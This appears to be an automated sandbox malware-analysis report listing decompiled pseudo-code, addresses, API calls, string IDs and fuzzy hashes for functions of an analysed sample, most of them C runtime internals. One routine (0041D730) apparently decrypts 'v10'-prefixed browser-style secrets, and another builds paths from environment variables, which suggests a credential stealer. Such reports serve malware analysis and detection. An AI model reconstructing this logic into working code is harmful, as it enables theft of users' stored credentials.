                                                                                                                              Function 004207B0, Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 83%
                                                                                                                              			E004207B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v548;
				intOrPtr* _v552;
				char* _v556;
				intOrPtr _v560;
				char _v561;
				intOrPtr* _v568;
				char* _v572;
				intOrPtr _v576;
				char _v577;
				intOrPtr* _v584;
				char* _v588;
				intOrPtr _v592;
				char _v593;
				void* __ebp;
				signed int _t64;
				intOrPtr* _t74;
				intOrPtr* _t81;
				intOrPtr* _t88;
				intOrPtr _t92;
				void* _t94;
				intOrPtr _t98;
				signed int _t137;
				void* _t138;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t149;

				_t136 = __esi;
				_t135 = __edi;
				_t99 = __ebx;
				_t64 =  *0x4301f4; // 0xe687535
				_v12 = _t64 ^ _t137;
				E004091C0( &_v540, 0, 0x104);
				E004091C0( &_v276, 0, 0x104);
				 *0x432768( &_v540,  *0x4326f4, _a4);
				_v8 = E00416CE0( &_v540, 0);
				_push( *0x43224c);
				_t74 = E0041A890(_a8,  *0x43224c, E00405DBC(__ebx, __edi, __esi, _t64 ^ _t137));
				_t144 = _t138 + 0x3c;
				_v552 = _t74;
				_v556 =  &_v276;
				_v560 = _v556;
				do {
					_v561 =  *_v552;
					 *_v556 = _v561;
					_v552 = _v552 + 1;
					_v556 = _v556 + 1;
					_t153 = _v561;
				} while (_v561 != 0);
				_push( *0x4321c4);
				_t81 = E0041A890( &_v276,  *0x4321c4, E00405DBC(__ebx, __edi, __esi, _t153));
				_t146 = _t144 + 0x10;
				_v568 = _t81;
				_v572 =  &_v276;
				_v576 = _v572;
				do {
					_v577 =  *_v568;
					 *_v572 = _v577;
					_v568 = _v568 + 1;
					_v572 = _v572 + 1;
					_t154 = _v577;
				} while (_v577 != 0);
				_push( *0x4324ec);
				_t88 = E0041A890( &_v276,  *0x4324ec, E00405DBC(__ebx, __edi, __esi, _t154));
				_t148 = _t146 + 0x10;
				_v584 = _t88;
				_v588 =  &_v276;
				_v592 = _v588;
				do {
					_v593 =  *_v584;
					 *_v588 = _v593;
					_v584 = _v584 + 1;
					_t133 = _v588 + 1;
					_v588 = _v588 + 1;
				} while (_v593 != 0);
				_t92 = E0040540F(__ebx, _t133, __edi, _a12, ",",  &_v548);
				_t149 = _t148 + 0xc;
				_v544 = _t92;
				while(1) {
					_t156 = _v544;
					if(_v544 == 0) {
						break;
					}
					E004202A0(_t99, _v544, _t135, _t136, _t156, _v8, 0x4294ce,  &_v276, _v544);
					_t133 =  &_v548;
					_t98 = E0040540F(_t99,  &_v548, _t135, 0, ",",  &_v548);
					_t149 = _t149 + 0x1c;
					_v544 = _t98;
				}
				_t94 = E00417A10(_v8);
				__eflags = _v12 ^ _t137;
				return E00404354(_t94, _t99, _v12 ^ _t137, _t133, _t135, _t136);
			}



































                                                                                                                              0x004207b0
                                                                                                                              0x004207b0
                                                                                                                              0x004207b0
                                                                                                                              0x004207b9
                                                                                                                              0x004207c0
                                                                                                                              0x004207d1
                                                                                                                              0x004207e7
                                                                                                                              0x00420800
                                                                                                                              0x0042081a
                                                                                                                              0x00420822
                                                                                                                              0x00420837
                                                                                                                              0x0042083c
                                                                                                                              0x0042083f
                                                                                                                              0x0042084b
                                                                                                                              0x00420857
                                                                                                                              0x0042085d
                                                                                                                              0x00420865
                                                                                                                              0x00420877
                                                                                                                              0x00420882
                                                                                                                              0x00420891
                                                                                                                              0x00420897
                                                                                                                              0x00420897
                                                                                                                              0x004208a6
                                                                                                                              0x004208bd
                                                                                                                              0x004208c2
                                                                                                                              0x004208c5
                                                                                                                              0x004208d1
                                                                                                                              0x004208dd
                                                                                                                              0x004208e3
                                                                                                                              0x004208eb
                                                                                                                              0x004208fd
                                                                                                                              0x00420908
                                                                                                                              0x00420917
                                                                                                                              0x0042091d
                                                                                                                              0x0042091d
                                                                                                                              0x0042092c
                                                                                                                              0x00420944
                                                                                                                              0x00420949
                                                                                                                              0x0042094c
                                                                                                                              0x00420958
                                                                                                                              0x00420964
                                                                                                                              0x0042096a
                                                                                                                              0x00420972
                                                                                                                              0x00420984
                                                                                                                              0x0042098f
                                                                                                                              0x0042099b
                                                                                                                              0x0042099e
                                                                                                                              0x004209a4
                                                                                                                              0x004209bd
                                                                                                                              0x004209c2
                                                                                                                              0x004209c5
                                                                                                                              0x004209cb
                                                                                                                              0x004209cb
                                                                                                                              0x004209d2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004209eb
                                                                                                                              0x004209f3
                                                                                                                              0x00420a01
                                                                                                                              0x00420a06
                                                                                                                              0x00420a09
                                                                                                                              0x00420a09
                                                                                                                              0x00420a15
                                                                                                                              0x00420a20
                                                                                                                              0x00420a2a

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __wgetenv$_memset_strtok_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3258467579-0
                                                                                                                              • Opcode ID: e02be8a06755b44e2c9d88bf1494623bc16e3b012c7e6589cba44444dd2a2790
                                                                                                                              • Instruction ID: d088c8966d5c9ab565de684a1559397d5dd8539fb1def0dbb97cd76fea656f82
                                                                                                                              • Opcode Fuzzy Hash: e02be8a06755b44e2c9d88bf1494623bc16e3b012c7e6589cba44444dd2a2790
                                                                                                                              • Instruction Fuzzy Hash: BE616AB5D01228ABCB25DB64EC89BDAB7B4AF58304F0441EAE50DA7352E6349FC4CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041D730, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 144memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 40%
                                                                                                                              			E0041D730(void* __ebx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				long _v92;
				void* _v96;
				signed int _v100;
				char _v128;
				signed int _v132;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t70;
				void* _t94;
				char* _t129;
				void* _t130;
				intOrPtr _t131;
				void* _t132;
				signed int _t133;
				intOrPtr _t143;

				_t94 = __ebx;
				_push(0xffffffff);
				_push(E0042648B);
				_push( *[fs:0x0]);
				_t69 =  *0x4301f4; // 0xe687535
				_t70 = _t69 ^ _t133;
				_v100 = _t70;
				_push(_t131);
				_push(_t129);
				_push(_t70);
				 *[fs:0x0] =  &_v16;
				_v132 = 0;
				if(_a12 < 3) {
					L10:
					_t120 = _a12;
					E004011C0(_a4, E0041CD30(_a12, _t129, _t131, 0, _a8, _a12));
					_v132 = _v132 | 0x00000001;
					_t75 = _a4;
					L11:
					 *[fs:0x0] = _v16;
					_pop(_t130);
					_pop(_t132);
					return E00404354(_t75, _t94, _v100 ^ _t133, _t120, _t130, _t132);
				}
				_t129 = "v10";
				_t131 = _a8;
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				} else {
					_t143 = _a20;
					_t120 = 0 | _t143 != 0x00000000;
					if(((0 | _a16 != 0x00000000) & _t143 != 0x00000000) == 0) {
						E004011C0(_a4, "null");
						_v132 = _v132 | 0x00000001;
						_t75 = _a4;
					} else {
						E004091C0( &_v88, 0, 0x40);
						_v88 = 0x40;
						_v84 = 1;
						_v80 = _a8 + 3;
						_v76 = 0xc;
						_v64 = _v80 + _a12 - 0x13;
						_v60 = 0x10;
						_t120 = _a12 - 3 - _v76 - _v60;
						_v92 = _a12 - 3 - _v76 - _v60;
						_v96 = LocalAlloc(0x40, _v92);
						if(_v96 != 0) {
							_t120 = _v92;
							_v20 =  *0x4328cc(_a20, _v80 + _v76, _v92,  &_v88, 0, 0, _v96, _v92,  &_v92, 0);
							if(_v20 < 0) {
								E004011C0(_a4, "null");
								_v132 = _v132 | 0x00000001;
								_t75 = _a4;
							} else {
								E00403F50( &_v128, _v96, _v92);
								_v8 = 0;
								E00401240(_a4,  &_v128);
								_t120 = _v132 | 0x00000001;
								_v132 = _v132 | 0x00000001;
								_v8 = 0xffffffff;
								E004012D0( &_v128);
								_t75 = _a4;
							}
						}
					}
					goto L11;
				}
			}




























                                                                                                                              0x0041d730
                                                                                                                              0x0041d733
                                                                                                                              0x0041d735
                                                                                                                              0x0041d740
                                                                                                                              0x0041d744
                                                                                                                              0x0041d749
                                                                                                                              0x0041d74b
                                                                                                                              0x0041d74e
                                                                                                                              0x0041d74f
                                                                                                                              0x0041d750
                                                                                                                              0x0041d754
                                                                                                                              0x0041d75a
                                                                                                                              0x0041d765
                                                                                                                              0x0041d8b6
                                                                                                                              0x0041d8b6
                                                                                                                              0x0041d8ca
                                                                                                                              0x0041d8d5
                                                                                                                              0x0041d8d8
                                                                                                                              0x0041d8db
                                                                                                                              0x0041d8de
                                                                                                                              0x0041d8e6
                                                                                                                              0x0041d8e7
                                                                                                                              0x0041d8f5
                                                                                                                              0x0041d8f5
                                                                                                                              0x0041d770
                                                                                                                              0x0041d775
                                                                                                                              0x0041d77a
                                                                                                                              0x0041d77c
                                                                                                                              0x00000000
                                                                                                                              0x0041d782
                                                                                                                              0x0041d78d
                                                                                                                              0x0041d791
                                                                                                                              0x0041d796
                                                                                                                              0x0041d8a1
                                                                                                                              0x0041d8ac
                                                                                                                              0x0041d8af
                                                                                                                              0x0041d79c
                                                                                                                              0x0041d7a4
                                                                                                                              0x0041d7ac
                                                                                                                              0x0041d7b3
                                                                                                                              0x0041d7c0
                                                                                                                              0x0041d7c3
                                                                                                                              0x0041d7d4
                                                                                                                              0x0041d7d7
                                                                                                                              0x0041d7e7
                                                                                                                              0x0041d7ea
                                                                                                                              0x0041d7f9
                                                                                                                              0x0041d800
                                                                                                                              0x0041d81c
                                                                                                                              0x0041d831
                                                                                                                              0x0041d838
                                                                                                                              0x0041d884
                                                                                                                              0x0041d88f
                                                                                                                              0x0041d892
                                                                                                                              0x0041d83a
                                                                                                                              0x0041d845
                                                                                                                              0x0041d84a
                                                                                                                              0x0041d858
                                                                                                                              0x0041d860
                                                                                                                              0x0041d863
                                                                                                                              0x0041d866
                                                                                                                              0x0041d870
                                                                                                                              0x0041d875
                                                                                                                              0x0041d875
                                                                                                                              0x0041d838
                                                                                                                              0x0041d800
                                                                                                                              0x00000000
                                                                                                                              0x0041d796

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocLocal_memset
                                                                                                                              • String ID: @$null$null$v10
                                                                                                                              • API String ID: 52611349-142188288
                                                                                                                              • Opcode ID: 08f85b548037c1a3eff85f49ec059fae9ba0d3ead2541e9c33720b85b54bc36a
                                                                                                                              • Instruction ID: 6db23229f21a6e608e8a6053353fe2398a331c56b1330644fce70f190f6e2a5f
                                                                                                                              • Opcode Fuzzy Hash: 08f85b548037c1a3eff85f49ec059fae9ba0d3ead2541e9c33720b85b54bc36a
                                                                                                                              • Instruction Fuzzy Hash: 8551FCB1E002089FDB08DFD9D895BDEBBB5FF48304F10812AF515AB294DB74A945CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040831E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E0040831E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_push(8);
				_push(0x42de30);
				E00408C20(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x4281f0;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x430200;
				E0040B23F(0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E004083C0();
				E0040B23F(0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x430968; // 0x430890
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00407F62( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E00408C65(E004083C9());
			}







                                                                                                                              0x0040831e
                                                                                                                              0x00408320
                                                                                                                              0x00408325
                                                                                                                              0x0040832f
                                                                                                                              0x00408335
                                                                                                                              0x00408338
                                                                                                                              0x0040833f
                                                                                                                              0x00408346
                                                                                                                              0x00408349
                                                                                                                              0x0040834c
                                                                                                                              0x00408353
                                                                                                                              0x0040835a
                                                                                                                              0x00408363
                                                                                                                              0x00408369
                                                                                                                              0x00408370
                                                                                                                              0x00408376
                                                                                                                              0x0040837d
                                                                                                                              0x00408384
                                                                                                                              0x0040838a
                                                                                                                              0x0040838d
                                                                                                                              0x00408390
                                                                                                                              0x00408395
                                                                                                                              0x00408397
                                                                                                                              0x0040839c
                                                                                                                              0x0040839c
                                                                                                                              0x004083a2
                                                                                                                              0x004083a8
                                                                                                                              0x004083b9

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042DE30,00000008,00408426,00000000,00000000,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 0040832F
                                                                                                                              • __lock.LIBCMT ref: 00408363
                                                                                                                                • Part of subcall function 0040B23F: __mtinitlocknum.LIBCMT ref: 0040B255
                                                                                                                                • Part of subcall function 0040B23F: __amsg_exit.LIBCMT ref: 0040B261
                                                                                                                                • Part of subcall function 0040B23F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00408368,0000000D), ref: 0040B269
                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00408370
                                                                                                                              • __lock.LIBCMT ref: 00408384
                                                                                                                              • ___addlocaleref.LIBCMT ref: 004083A2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                              • Opcode ID: 8dc3ce37796b9a95288184c909ba6167b2cd58c630a66380ed31e728b2bcc56c
                                                                                                                              • Instruction ID: 06921ac613ad9e7e9797a4722a9f39b8002c478922b7085ed423b9429ee85603
                                                                                                                              • Opcode Fuzzy Hash: 8dc3ce37796b9a95288184c909ba6167b2cd58c630a66380ed31e728b2bcc56c
                                                                                                                              • Instruction Fuzzy Hash: 41018E71905B00DAE720AF66D909709FBE0AF50724F20895FE4D5A62E1CFB8A544CB1D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00425742, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 76%
                                                                                                                              			E00425742(void* __ebx, void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				void* _t16;
				intOrPtr* _t19;
				void* _t25;

				_t26 = __esi;
				_t24 = __edx;
				_t23 = __ebx;
				_t31 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
					L8:
					__eflags =  *((intOrPtr*)(E0040844B(_t24, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E0040844B(_t24, _t25, __eflags);
						_t9 = _t16 + 0x90;
						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t9;
					}
					goto L10;
				} else {
					__eflags = __eax - 0xe0434f4d;
					if(__eflags == 0) {
						goto L8;
					} else {
						__eflags = __eax - 0xe06d7363;
						if(__eflags != 0) {
							L10:
							__eflags = 0;
							return 0;
						} else {
							 *(E0040844B(__edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
							_push(8);
							_push(0x42dfe8);
							E00408C20(__ebx, _t25, __esi);
							_t19 =  *((intOrPtr*)(E0040844B(__edx, _t25, _t31) + 0x78));
							if(_t19 != 0) {
								_v8 = _v8 & 0x00000000;
								 *_t19();
								_v8 = 0xfffffffe;
							}
							return E00408C65(E004125F1(_t23, _t24, _t25, _t26));
						}
					}
				}
			}








                                                                                                                              0x00425742
                                                                                                                              0x00425742
                                                                                                                              0x00425742
                                                                                                                              0x0042574e
                                                                                                                              0x00425753
                                                                                                                              0x00425774
                                                                                                                              0x00425779
                                                                                                                              0x00425780
                                                                                                                              0x00425782
                                                                                                                              0x00425787
                                                                                                                              0x00425787
                                                                                                                              0x00425787
                                                                                                                              0x00425787
                                                                                                                              0x00000000
                                                                                                                              0x00425755
                                                                                                                              0x00425755
                                                                                                                              0x0042575a
                                                                                                                              0x00000000
                                                                                                                              0x0042575c
                                                                                                                              0x0042575c
                                                                                                                              0x00425761
                                                                                                                              0x0042578d
                                                                                                                              0x0042578d
                                                                                                                              0x00425790
                                                                                                                              0x00425763
                                                                                                                              0x00425768
                                                                                                                              0x0040f63d
                                                                                                                              0x0040f63f
                                                                                                                              0x0040f644
                                                                                                                              0x0040f64e
                                                                                                                              0x0040f653
                                                                                                                              0x0040f655
                                                                                                                              0x0040f659
                                                                                                                              0x0040f664
                                                                                                                              0x0040f664
                                                                                                                              0x0040f675
                                                                                                                              0x0040f675
                                                                                                                              0x00425761
                                                                                                                              0x0042575a

                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 00425763
                                                                                                                                • Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
                                                                                                                                • Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B
                                                                                                                              • __getptd.LIBCMT ref: 00425774
                                                                                                                              • __getptd.LIBCMT ref: 00425782
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                              • API String ID: 803148776-2671469338
                                                                                                                              • Opcode ID: 36e216435a19a69b5e7bcfee0304e1495cac26ab6edcfc8f9ed2c1b4ad4e0b23
                                                                                                                              • Instruction ID: a53cf0b58843d3a613f91901a7b789298cb95d75ea8bfa8c68308931ec6748e6
                                                                                                                              • Opcode Fuzzy Hash: 36e216435a19a69b5e7bcfee0304e1495cac26ab6edcfc8f9ed2c1b4ad4e0b23
                                                                                                                              • Instruction Fuzzy Hash: 86E01230644514CEC720DBA9D14A7A936E5FF84318F5515F7E44CCB362DB3CD851598B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004259F4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E004259F4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x42e7c8);
				E00408C20(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00425587(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E0042562C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00425B1A(_t48, _t53, _t55, _t57, _t61);
				return E00408C65( *((intOrPtr*)(_t58 - 0x1c)));
			}








                                                                                                                              0x004259f4
                                                                                                                              0x004259f4
                                                                                                                              0x004259f6
                                                                                                                              0x004259fb
                                                                                                                              0x00425a00
                                                                                                                              0x00425a02
                                                                                                                              0x00425a05
                                                                                                                              0x00425a08
                                                                                                                              0x00425a0b
                                                                                                                              0x00425a12
                                                                                                                              0x00425a23
                                                                                                                              0x00425a31
                                                                                                                              0x00425a3f
                                                                                                                              0x00425a47
                                                                                                                              0x00425a55
                                                                                                                              0x00425a5b
                                                                                                                              0x00425a62
                                                                                                                              0x00425a65
                                                                                                                              0x00425a7b
                                                                                                                              0x00425a7e
                                                                                                                              0x00425af3
                                                                                                                              0x00425afa
                                                                                                                              0x00425b01
                                                                                                                              0x00425b0e

                                                                                                                              APIs
                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00425A1C
                                                                                                                                • Part of subcall function 00425587: __getptd.LIBCMT ref: 00425595
                                                                                                                                • Part of subcall function 00425587: __getptd.LIBCMT ref: 004255A3
                                                                                                                              • __getptd.LIBCMT ref: 00425A26
                                                                                                                                • Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
                                                                                                                                • Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B
                                                                                                                              • __getptd.LIBCMT ref: 00425A34
                                                                                                                              • __getptd.LIBCMT ref: 00425A42
                                                                                                                              • __getptd.LIBCMT ref: 00425A4D
                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 00425A73
                                                                                                                                • Part of subcall function 0042562C: __CallSettingFrame@12.LIBCMT ref: 00425678
                                                                                                                                • Part of subcall function 00425B1A: __getptd.LIBCMT ref: 00425B29
                                                                                                                                • Part of subcall function 00425B1A: __getptd.LIBCMT ref: 00425B37
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1602911419-0
                                                                                                                              • Opcode ID: b524b819e114a7a0f536bcce9b494da9e256328cc1a4bff23359c6763e2fe9eb
                                                                                                                              • Instruction ID: 3bc6e67a87ea4963972b6cd327c8599b414d9d2cb2c0c0bc411de041e5890d68
                                                                                                                              • Opcode Fuzzy Hash: b524b819e114a7a0f536bcce9b494da9e256328cc1a4bff23359c6763e2fe9eb
                                                                                                                              • Instruction Fuzzy Hash: 5F1119B1D00609EFDB00EFA5D586BAD7BB0FF04318F50806EF854A7291DB789A119F55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00407AA1, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E00407AA1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x42ddd0);
				E00408C20(__ebx, __edi, __esi);
				_t31 = E0040844B(__edx, __edi, _t35);
				_t15 =  *0x430720; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040B23F(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x430628; // 0x430200
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x430200;
								if(__eflags != 0) {
									E00405341(_t33);
								}
							}
						}
						_t21 =  *0x430628; // 0x430200
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x430628; // 0x430200
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00407B3C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00408BF8(_t25, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00408C65(_t33);
			}









                                                                                                                              0x00407aa1
                                                                                                                              0x00407aa1
                                                                                                                              0x00407aa1
                                                                                                                              0x00407aa1
                                                                                                                              0x00407aa3
                                                                                                                              0x00407aa8
                                                                                                                              0x00407ab2
                                                                                                                              0x00407ab4
                                                                                                                              0x00407abc
                                                                                                                              0x00407add
                                                                                                                              0x00407ae3
                                                                                                                              0x00407ae7
                                                                                                                              0x00407aea
                                                                                                                              0x00407aed
                                                                                                                              0x00407af3
                                                                                                                              0x00407af5
                                                                                                                              0x00407af7
                                                                                                                              0x00407b00
                                                                                                                              0x00407b02
                                                                                                                              0x00407b04
                                                                                                                              0x00407b0a
                                                                                                                              0x00407b0d
                                                                                                                              0x00407b12
                                                                                                                              0x00407b0a
                                                                                                                              0x00407b02
                                                                                                                              0x00407b13
                                                                                                                              0x00407b18
                                                                                                                              0x00407b1b
                                                                                                                              0x00407b21
                                                                                                                              0x00407b25
                                                                                                                              0x00407b25
                                                                                                                              0x00407b2b
                                                                                                                              0x00407b32
                                                                                                                              0x00407ac4
                                                                                                                              0x00407ac4
                                                                                                                              0x00407ac4
                                                                                                                              0x00407ac7
                                                                                                                              0x00407ac9
                                                                                                                              0x00407acd
                                                                                                                              0x00407ad2
                                                                                                                              0x00407ada

                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 00407AAD
                                                                                                                                • Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
                                                                                                                                • Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B
                                                                                                                              • __amsg_exit.LIBCMT ref: 00407ACD
                                                                                                                              • __lock.LIBCMT ref: 00407ADD
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00407AFA
                                                                                                                              • _free.LIBCMT ref: 00407B0D
                                                                                                                              • InterlockedIncrement.KERNEL32(00430200), ref: 00407B25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3470314060-0
                                                                                                                              • Opcode ID: 3f8be9e51290dcc651e7121cd800779f8bce3a9782d89db55d4154487ca158d0
                                                                                                                              • Instruction ID: 49243f148acfb267e9107d8de470b05406bbb721a83e860cd0129b663bff1516
